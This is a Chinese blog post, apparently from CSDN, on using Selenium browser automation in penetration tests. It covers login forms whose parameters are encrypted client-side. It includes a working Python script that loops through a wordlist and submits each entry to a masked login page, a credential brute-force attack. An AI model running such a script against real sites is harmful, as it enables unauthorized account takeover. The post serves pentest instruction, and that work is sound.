python自动化渗透测试_Python Selenium 渗透测试中的使用

最新推荐文章于 2023-04-11 22:00:49 发布
最新推荐文章于 2023-04-11 22:00:49 发布
阅读量264 收藏 1
点赞数
文章标签: python自动化渗透测试

在渗透测试过程中如果请求传参被加密且加密传输方法通过前端js无法定位到的情况下,这种如果是登录口要进行字典枚举测试那就可以通过Selenium浏览器自动化测试框架来进行自动化测试

Selenium 驱动调用

from selenium import webdriver

## 如果是chrome浏览器的驱动

driver=webdriver.Chrome("G:\Anaconda3-5.3.0\chromedriver.exe")

##如果是firefox浏览器的驱动

driver=webdriver.Firefox(executable_path="G:\Anaconda3-5.3.0\geckodriver.exe")

######如果浏览器驱动的目录加入了环境变量的话

## 如果是chrome浏览器的驱动

driver=webdriver.Chrome()

##如果是firefox浏览器的驱动

driver=webdriver.Firefox()

Selenium定位元素

> 定位一个元素定位多个元素含义

> find_element_by_id通过元素id定位

> find_element_by_name通过元素name定位

> find_element_by_class_name通过classname进行定位

> find_element_by_tag_name通过标签定位

> find_element_by_link_text通过完整超链接定位

> find_element_by_partial_link_text通过部分链接定位

> find_elements_by_css_selector通过css选择器进行定位

> find_element_by_xpath通过xpath表达式定位

渗透测试中案例使用

对某个系统进行渗透测试过程中登录口为了爆破通常进行抓包查看请求包,这里就发现一个请求传参是完全加密的案例

这里可以看到他所有的传参都传给encode参数进行加密处理,这样的话我们要爆破的话就无从下手,当然可以F12跟踪js代码看是否在前端进行交互调用加密方法,如果是要分析学习这类型的可以跳到我前段时间写的文章进行学习:https://www.cnblogs.com/jicklun/p/13944040.html,这里我们重点说下用Selenium框架如何对加密传参的站点进行爆破

我们这里可以看到传参加密了,如果我们单独进行传参请求爆破肯定是行不通的,首先要利用Selenium爆破我们要定位下前端的登录账号密码的元素ID

这里可以看到我们可以很方便的定位到元素主要为input标签里的bofid元素属性,这里就可以构造代码进行编写

代码主要是定位input标签下的bofid元素中的属性值来进行定位输入字典内容,然后通过循环来进行模拟浏览器来进行批量爆破

#coding=utf-8

from selenium import webdriver

import time

import sys

class Haidchr:

def __init__(self):

self.chrome_driver = "chromedriver.exe"

self.driver = webdriver.Chrome(executable_path = self.chrome_driver)

def login(self,pwd):

try:

self.driver.get("https://www.xxxx.com/vision/index.jsp")

username = self.driver.find_element_by_xpath('//input[@bofid="username"]')

username.send_keys(pwd.strip())

password=self.driver.find_element_by_xpath('//input[@bofid="password"]')

password.send_keys(pwd.strip())

self.driver.find_element_by_xpath('//input[@bofid="login"]').click()

print (pwd)

time.sleep(0.5)

except:

print ("NO")

if __name__ == '__main__':

Haid_chr = Haidchr()

for pwd in open(sys.argv[1],'r+'):

Haid_chr.login(pwd)

运行效果如下:

weixin_39653764
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python 调用selenium 做爬虫, 调用chrome浏览器的参数有哪些
vrix的专栏
05-06 1146
先来一段代码,大家看一下: from selenium import webdriver from selenium.webdriver.chrome.options import Options from selenium.webdriver.common.by import By class ChromeTool: debug = False driver = None...
pythonselenium使用
Alden_Wei的博客
05-27 963
目录一、简介二、安装三、下载驱动器四、简单实例五、配置浏览器(一)配置浏览器(二)添加代理六、定位标签七、页面操作八、等待页面加载(一)显示等待(二)隐式等待自动点赞实现一)导入第三方库(二)登录账号完整代码 一、简介 我们模拟登陆用的是selenium库,selenium是一个自动化测试工具,在爬虫通常用来进行模拟登陆。它支持各种浏览器,包括 Chrome,Safari,Firefox 等主流界面式浏览器,同时Selenium也支持多种语言开发,比如 Java,C,Ruby、Python等等。 二、安装
python渗透测试python渗透测试的利用(完全版,持续出)
人间体佐菲的博客
04-11 3544
下面的示例演示了如何使用Python socket模块编写自定义协议的实现:'utf-8'01'utf-8'在上述代码,我们首先定义了一个handle_client()函数来处理客户端请求。该函数接收客户端套接字对象作为参数,并使用recv()方法接收客户端发送的数据。然后,它打印接收到的消息并使用send()方法发送响应。最后,它关闭客户端套接字以释放资源。服务器端首先创建一个套接字对象,并将其绑定到本地IP地址和端口。然后,它开始监听连接请求,并在while循环等待客户端连接。
Python自动化测试的完整流程,看完才知道原来这么简单
weixin_55154866的博客
01-03 2082
自动化测试流程图:第一步:制定好测试计划我们在准备展开自动化测试之前,最好是先制定好测试计划,明确测试对象、测试目的、测试的项目内容、测试的方法、测试的进度要求,并确保测试所需的人力、硬件、数据等资源都准备充分。制定好测试计划后,下发给用例设计者。第二步:分析好测试需求测试用例设计者根据测试计划和需求说明书,分析测试需求,设计测试需求树,以便用例设计时能够覆盖所有的需求点。一般来讲,基于Web功能测试需要覆盖一下几个方面:页面链接测试,确保各个链接正常;页面控件测试,确保各个控件可靠;
Python开源项目大全
catch
04-03 2065
Python 作为程序员的宠儿,越来越得到人们的关注,使用 Python 进行应用程序开发的越来也多。那么,在 2013 年有哪些流行的 Python 项目呢?下面,我们一起来看下。   一、测试和调试 python_koans:Python Koans 算 “Ruby Koans” 的一部分,作为交互式教程,可以学习 TDD 技巧。sure:Sure 是最适合自动化测试的 Pyt
网络安全-渗透测试工具Python编程
Kevinyou123的博客
04-21 1722
第一弹 目录扫描器 前言: 自己学了渗透测试也有小半年了,期间也用看过不少教程,用过不少工具。但是听前辈说,干渗透挖掘这一行,用别人的工具,你只能当个脚本小子。所以,为了拒当脚本小子,往后我的博客会用python来写一些渗透测试常见的工具。代码不在多而在于精,我的主要目的是用最简单的代码实现强大的功能。 我用的IDE是pycharm,用的python3(首先导入urllib3包,用python2...
Pythonselenium使用
qq_37046020的博客
07-31 1571
刚接触Python不到一个月,今天学习了selenium使用方法,现在在这里给大家分享一下。 selenium的简介 selenium 文翻译“硒”(别问为什么,我也很纠结) 是一个自动化测试工具。 seleniumPython的应用: 1.用于模拟人对浏览器进行操作,对动态数据进行获取(动态数据是由代码生成,在页面初始化的过程当是没有的,所以无法直接获取) 2.网页上有些数...
ApacheTomcat自动WAR部署和pwning渗透测试工具。_Python_下载.zip
04-22
7. **自动化测试框架**:使用Selenium、Burp Suite或OWASP ZAP等工具进行自动化安全测试。 8. **日志分析**:监控Tomcat日志,以便在部署过程或攻击模拟后分析异常行为。 9. **安全响应**:学习如何应对和修复在...
jd_seckill京东抢茅台插件最新版【京东飞天茅台1499抢购】Python脚本的完整安装+使用教程
02-04
在当前的数字化时代,自动化工具已经渗透到各个领域,其包括购物平台上的商品抢购。针对热门商品如京东上的飞天茅台1499元抢购,开发者们利用Python编程语言编写了专门的脚本——jd_seckill插件,旨在帮助用户提高...
Python-TerminatorMetasploit负载生成器
08-10
除了基本的payload生成,Terminator还可以结合其他Python库和工具,比如自动化测试框架Selenium,或者网络扫描工具Nmap,实现更复杂的渗透测试场景。此外,对于有编程基础的用户,可以通过修改Terminator的源代码,...
千锋教育Python入门教程.pdf
06-13
10. **Python项目实战**:包括爬虫开发,使用Selenium或lr工具进行自动化测试,以及利用Django或Flask框架搭建网站后台。 11. **Python机器学习与数据挖掘**:这涉及到机器学习算法,如线性回归、决策树、神经网络...
ApacheCN Python 文文档集
09-30
文档将详细解释如何使用Scapy构造和分析网络数据包,执行嗅探、欺骗、故障注入等操作,这对于网络协议分析、渗透测试以及网络安全研究至关重要。 最后,我们关注的是Scrapy 1.6文文档。Scrapy是一个用Python...
史上最强Python渗透测试工具合集
python基础教程
06-26 2079
如果你热爱漏洞研究、逆向工程或者渗透测试,我强烈推荐你使用 Python 作为编程语言。它包含大量实用的库和工具,本文会列举其部分精华。 网络 Scapy, Scapy3k: 发送,嗅探,分析和伪造网络数据包。可用作交互式包处理程序或单独作为一个库。 pypcap, Pcapy, pylibpcap: 几个不同 libpcap 捆绑的python库 libdnet: 低级网络路由,包括端口查看和以太网帧的转发 dpkt: 快速,轻量数据包创建和分析,面向基本的 TCP/IP 协议 Impacket:..
python安全攻防】将python脚本部署到web渗透平台,浏览器前端运行后台python脚本
白帽子续命指南
11-12 869
项目地址 https://gitee.com/c0ny10/information-collection-demo/ 可以看到有两个文件(目前是只有两个,以后会一点点上传的),一个是py文件,一个是html文件,这两个文件分别对应着python脚本和前端代码,下面来分别说说这两个文件应该如何编写。 python脚本 python脚本有一个要求,除了主要逻辑代码的书写以外,必须以接收命令行参数的方式传递参数。 不会的朋友可以看看上一期的文章,有手就能学会,(开玩笑的,没手也行) https://mp.wei
12.7、后渗透测试--python插件执行py脚本
无痕的博客
12-14 497
metasploit后渗透meterpreter测试--python插件执行py脚本
Python渗透测试编程技术——漏洞渗透模块
bluepangzi的博客
03-30 379
漏洞渗透模块一、测试软件的溢出漏洞栈溢出漏洞发现自行构造数据包加大字符串的数量二、计算软件溢出的偏移地址显示软件FreeFloat FTP Server执行到地址“41414141”处时就无法再继续进行三、查找JMP ESP指令 一、测试软件的溢出漏洞 栈溢出漏洞发现 FreeFloat FTP Server会在运行的主机上建立一个FTP,主机192.168.0.116的C盘运行FTP软件,在另一计算机使用FTP下载工具或命令方式进行访问。 (使用 FreeFloat FTP Server服务器对登
使用Python编写一个渗透测试探测工具
weixin_33816300的博客
11-22 822
本篇将会涉及: 资源探测 一个有用的字典资源 第一个暴力探测器 文章首发:zmister.com/archives/18…资源探测资源探测在渗透测试还是属于资源的映射和信息的收集阶段。主要有以下三个类型: 字典攻击 暴力破解 模糊测试 字典攻击,在破解密码或密钥的时候,通过自定义的字典文件,有针对性地尝试字典文件内所有的字典组合。 暴力破解,也叫做穷举法,按照特定的组合,进行枚举所有的组...
全网最详细的Python自动化测试
热门推荐
m0_59164520的博客
10-15 1万+
什么是python自动化?我理解的Python自动化测试就是把以前人为测试转化为机器测试的一种过程。自动化测试是一种比手工测试更快获得故障反馈的方法。自动化测试是一种质量保障的方式,最重要的还是以做好一款高质量产品为前提。测试工作很多时候就是在不断平衡质量、效率、驱动业务这三者之间的比例和深度。根据不同的业务阶段、不同的目标、当前的关键事件驱动,在质量、效率、驱动业务上不断地调整策略和战术。
NC57供应商管理.pdf
最新发布
07-11
NC57供应商管理
python自动化测试
04-30
在安全测试Python也拥有强大的安全测试工具集,如OWASP ZAP、Selenium等,可以实现自动化渗透测试和漏洞扫描。 Python自动化测试的优势在于其易于编写和维护脚本。Python的语法简单易懂,支持许多框架和库,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值